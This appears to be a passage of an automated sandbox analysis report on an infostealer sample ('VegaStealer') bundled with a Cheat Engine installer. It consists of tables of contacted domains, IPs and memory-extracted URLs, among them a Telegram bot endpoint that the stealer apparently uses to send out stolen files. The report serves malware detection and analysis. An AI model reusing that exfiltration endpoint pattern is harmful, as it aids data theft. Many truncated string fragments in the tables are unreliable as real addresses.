https://d34hwk9wxgk5fi.cloudfront.net/f/RAV_Triple_NCB/images/DOTPS-855/EN.pnge	0%	Avira URL Cloud	safe
http://go.microsoft	0%	Avira URL Cloud	safe
https://d31tu1fsc224h4.cloudfront.net/FbN	0%	Avira URL Cloud	safe
https://www.premieropinion.com/privacy-policy-	0%	Avira URL Cloud	safe
https://www.premieropinion.com/privacy-policyG	0%	Avira URL Cloud	safe
https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/files/1489/saBSI.zipp.png4	0%	Avira URL Cloud	safe
https://d31tu1fsc224h4.cloudfront.net:443/bdp	0%	Avira URL Cloud	safe
https://d31tu1fsc224h4.cloudfront.net:443/	0%	Avira URL Cloud	safe
http://www.microsoft.cx	0%	Avira URL Cloud	safe
https://d34hwk9wxgk5fi.cloudfront.net/K	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	high
cheatengine.org	104.20.94.94	true	false	high
d31tu1fsc224h4.cloudfront.net	13.226.4.166	true	false	unknown
eu-api.openweathermap.org	57.129.2.123	true	false	high
ipbase.com	104.21.85.189	true	false	high
d34hwk9wxgk5fi.cloudfront.net	65.9.108.148	true	false	unknown
ip-api.com	208.95.112.1	true	false	high
freegeoip.app	172.67.160.84	true	false	high
d2axwe94icddzf.cloudfront.net	18.66.161.99	true	false	unknown
d14mh4uvqj4iiz.cloudfront.net	18.66.161.123	true	false	unknown
shield.reasonsecurity.com	unknown	unknown	true	unknown
api.openweathermap.org	unknown	unknown	false	high
electron-shell.reasonsecurity.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ip-api.com/json/?fields=61439	false		high
https://d34hwk9wxgk5fi.cloudfront.net/f/WeatherZero/images/969/EN.png	false	Avira URL Cloud: safe	unknown
http://ip-api.com/json/	false		high
https://freegeoip.app/xml/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	v2.exe, 00000007.00000002.2183338634.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, tmpDFE9.tmp.dat.7.dr	false		high
https://webcompanion.com/terms	CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	v2.exe, 00000007.00000002.2183338634.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, tmpDFE9.tmp.dat.7.dr	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmp	false		high
https://d34hwk9wxgk5fi.cloudfront.net:443/zbdWgI	CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://home.mcafee.com/Root/AboutUs.aspx?id=eula	CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795447097.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.premieropinion.com/privacy-policyl	CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://shield.reasonsecurity.com/rsStubActivator.exe.	CheatEngine75.tmp, 00000008.00000002.3310876008.000000000758A000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://d34hwk9wxgk5fi.cloudfront.net/f/	CheatEngine75.exe, 00000006.00000002.3278514154.00000000021FC000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2045039146.0000000002530000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2070425658.0000000003490000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3292808652.000000000351C000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3286934906.0000000000C50000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3297816445.00000000035F9000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://freegeoip.app	v2.exe, 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.mcafee.com/consumer/en-us/policy/legal.htmles/969/EN.pngzipMSSP	CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.premieropinion.com/common/termsofservice-v1	CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000AEF000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3308240431.0000000005CB6000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D7B000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D51000.00000004.00000020.00020000.00000000.sdmp	false		high
https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/files/1489/saBSI.zippM32-xL	CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ns.adobe.0/	v2.exe, 00000007.00000002.2192717711.0000000007A81000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://go.microsof	VegaStealer_v2.exe, 00000005.00000003.2033044168.0000000003325000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.remobjects.com/ps	CheatEngine75.exe, 00000006.00000003.2060824018.0000000002670000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2066216365.000000007FB40000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000000.2068171833.0000000000401000.00000020.00000001.01000000.0000000F.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000000D.00000002.2259468035.000002505C180000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2444174666.000002D7EAFF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2304202480.000002D7DC737000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2444174666.000002D7EAEBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2582149482.00000265CFDAF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.innosetup.com/	CheatEngine75.exe, 00000006.00000003.2060824018.0000000002670000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2066216365.000000007FB40000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000000.2068171833.0000000000401000.00000020.00000001.01000000.0000000F.sdmp	false		high
https://www.sqlite.org/lang_corefunc.html	VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.Linq.dll.5.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	v2.exe, 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2188691626.000002504C111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2304202480.000002D7DAE41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2367950222.00000265BFD41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://assets.razerzone.com/downloads/software/RazerEndUser	CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.mcafee.com/consumer/en-us/policy/legal.htmlReplaced/OperaSetup.zipnet	CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D51000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://d34hwk9wxgk5fi.cloudfront.net:443/zbdk5fi.cloudfront.net:443/zbdv	CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl3.digicert.cPom/D	VegaStealer_v2.exe, 00000005.00000003.2013422206.0000000002C73000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2026508617.0000000002C74000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ccleaner.com/legal/end-user-license-agreement	CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000002B.00000002.2367950222.00000265BFF68000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/ASOFTWARE	VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp	false		high
http://crl3.digicert	VegaStealer_v2.exe, 00000005.00000003.2039557081.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000002B.00000002.2367950222.00000265BFF68000.00000004.00000800.00020000.00000000.sdmp	false		high
https://d31tu1fsc224h4.cloudfront.net:443//WebAdvisor/images/943/EN.png	CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.cxx	powershell.exe, 0000002B.00000002.2600381025.00000265D851C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 0000002B.00000002.2582149482.00000265CFDAF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://d34hwk9wxgk5fi.cloudfront.net/f/WeatherZero/images/969/EN.pngzip)yH	CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B3B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://shield.reasonsecurity.com/rsStubActivator.exem	CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D7B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	v2.exe, 00000007.00000002.2183338634.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, tmpDFE9.tmp.dat.7.dr	false		high
https://www.opera.com/he/eula/computers	CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://reasonlabs.com/policiesx	CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D7B000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D7B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	v2.exe, 00000007.00000002.2183338634.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, tmpDFE9.tmp.dat.7.dr	false		high
https://github.com/Pester/Pester	powershell.exe, 0000002B.00000002.2367950222.00000265BFF68000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.mcafee.com/consumer/en-us/policy/legal.html4	CheatEngine75.tmp, 00000008.00000003.2210401005.0000000004D61000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2334804112.0000000004D65000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2392056677.0000000004D61000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2453634826.0000000004D69000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D51000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000D.00000002.2188691626.000002504C338000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2367950222.00000265BFF68000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.opera.com/he/eula/computersl	CheatEngine75.tmp, 00000008.00000003.2453634826.0000000004D64000.00000004.00000020.00020000.00000000.sdmp	false		high
https://urn.to/r/sds_see	System.Data.SQLite.dll.5.dr	false		high
https://github.com/novotnyllc/bc-csharp	VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmp	false		high
https://shield.reasonsecurity.com/rsStubActivator.exeles/969/WZSetup.zip	CheatEngine75.tmp, 00000008.00000002.3286934906.0000000000CE0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://d34hwk9wxgk5fi.cloudfront.net/f/WeatherZero/files/969/WZSetup.zipjy	CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://d31tu1fsc224h4.cloudfront.net/IN	CheatEngine75.tmp, 00000008.00000002.3308240431.0000000005CA6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0	CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmp	false		high
https://system.data.sqlite.org/X	VegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2187538856.00000000059F4000.00000002.00000001.01000000.0000000C.sdmp, System.Data.SQLite.dll.5.dr	false		high
https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/files/1489/saBSI.zipTEM32-xL	CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.avg.com/ww-en/privacy..$	CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ip-api.com/json/?fieldsTDl	v2.exe, 00000007.00000002.2163857464.00000000032EE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.avast.co	CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://webcompanion.com/terms5/=	CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://reasonlabs.com/policies	CheatEngine75.tmp, 00000008.00000002.3310876008.000000000755F000.00000004.00001000.00020000.00000000.sdmp	false		high
https://d34hwk9wxgk5fi.cloudfront.net:443/zbd	CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reasonlabs.com/policies67r	CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004E0E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://go.microsoft	VegaStealer_v2.exe, 00000005.00000003.2033044168.0000000003325000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.avast.com/e	CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/VegaStealer_bot	VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2163857464.00000000031A6000.00000004.00000800.00020000.00000000.sdmp, v2.exe, 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, v2.exe, 00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2163857464.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ipbase.com	v2.exe, 00000007.00000002.2163857464.0000000002E77000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.avast.com	CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.avast.com/p	CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://assets.razerzone.com/downloads/software/RazerEndUserLicenseAgreement.pdf	CheatEngine75.tmp, 00000008.00000003.2334804112.0000000004D65000.00000004.00000020.00020000.00000000.sdmp	false		high
http://cacerts.di	VegaStealer_v2.exe, 00000005.00000003.2038592762.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.sqlite.org/lang_c	VegaStealer_v2.exe, 00000005.00000003.2040438850.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2041749558.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/VegaStealer_bot-/sendDocument?chat_id=	VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	v2.exe, 00000007.00000002.2183338634.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, tmpDFE9.tmp.dat.7.dr	false		high
https://www.premieropinion.com/privacy-policy-	CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelpX	powershell.exe, 0000000D.00000002.2188691626.000002504DFCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2188691626.000002504DFA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2367950222.00000265C1BC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2367950222.00000265C1BEC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.avast.com/eula	CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B22000.00000004.00000020.00020000.00000000.sdmp	false		high
https://d31tu1fsc224h4.cloudfront.net:443/gd	CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://d34hwk9wxgk5fi.cloudfront.net/f/RAV_Triple_NCB/images/DOTPS-855/EN.pnge	CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.sqlite.org/copyright.html2	VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002DC6000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmp	false		high
http://www.dk-soft.org/	CheatEngine75.exe, 00000006.00000002.3278514154.0000000002196000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2045039146.0000000002530000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2070425658.0000000003490000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3310876008.00000000075AF000.00000004.00001000.00020000.00000000.sdmp	false		high
https://freegeoip.app/xml/9https://api.telegram.org/botGhttps://api.vimeworld.ru/user/name/1--------	VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp	false		high
https://www.ccleaner.com/legal/end-use	CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://go.micro	VegaStealer_v2.exe, 00000005.00000003.2033044168.0000000003325000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmp	false		high
https://d31tu1fsc224h4.cloudfront.net/FbN	CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ccleaner.com/legal/end-usecense-agreem	CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.sqlite.org/lang	VegaStealer_v2.exe, 00000005.00000003.2040438850.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2041749558.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.premieropinion.com/privacy-policyG	CheatEngine75.tmp, 00000008.00000003.3038925703.0000000005C94000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/files/1489/saBSI.zipp.png4	CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://system.data.sqlite.org/	System.Data.SQLite.Linq.dll.5.dr	false		high
https://d31tu1fsc224h4.cloudfront.net:443/bdp	CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.nortonlifelock.com/us/en/privacy/Op	CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://webcompanion.com/privacys/	CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	CheatEngine75.exe, 00000006.00000000.2043231186.0000000000401000.00000020.00000001.01000000.00000007.sdmp	false		high
https://d31tu1fsc224h4.cloudfront.net:443/	CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
